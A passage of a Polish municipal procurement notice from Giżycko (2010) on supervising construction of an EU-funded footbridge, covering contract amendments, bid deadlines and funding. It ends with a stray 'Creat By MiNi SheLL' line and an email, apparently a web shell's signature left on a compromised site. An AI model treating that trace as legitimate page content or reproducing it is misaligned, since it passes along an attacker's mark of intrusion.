k) zaistnienia  okoliczności, których nie można było przewidzieć w chwili zawarcia umowy (anomalia pogodowe,  klęska żywiołowa),
l) stwierdzenia okoliczności, których Zamawiający nie mógł przewidzieć w dniu podpisania umowy w związku ze stwierdzeniem w trakcie realizacji budowy istotnych braków w dokumentacji projektowej, pomyłek lub błędów,
m) uzasadnionych zmian w zakresie wykonania umowy proponowanych przez Inżyniera Projektu lub Zamawiającego korzystnych dla Zamawiającego po uzyskaniu akceptacji Zamawiającego.
n) zmiany terminu zakończenia robót budowlanych.

2. Wszelkie zmiany umowy wymagają dla swej ważności formy pisemnej - aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gizycko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Techniczno - Inwestycyjny pok. 114, Urzędu Miejskiego w Giżycku, 
al. 1 Maja 14, 11-500 Giżycko..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2010 godzina 12:00, miejsce: Sekretariat (pok. 104) Urzędu Miejskiego w Giżycku, al. 1 Maja 14, 11-500 Giżycko..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn.:Nadzór inwestorski nad realizacją zadania - Budowa kładki nad ulicą Kolejową oraz torami - łączącej  jezioro Niegocin z centrum miasta Giżycka -  dofinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com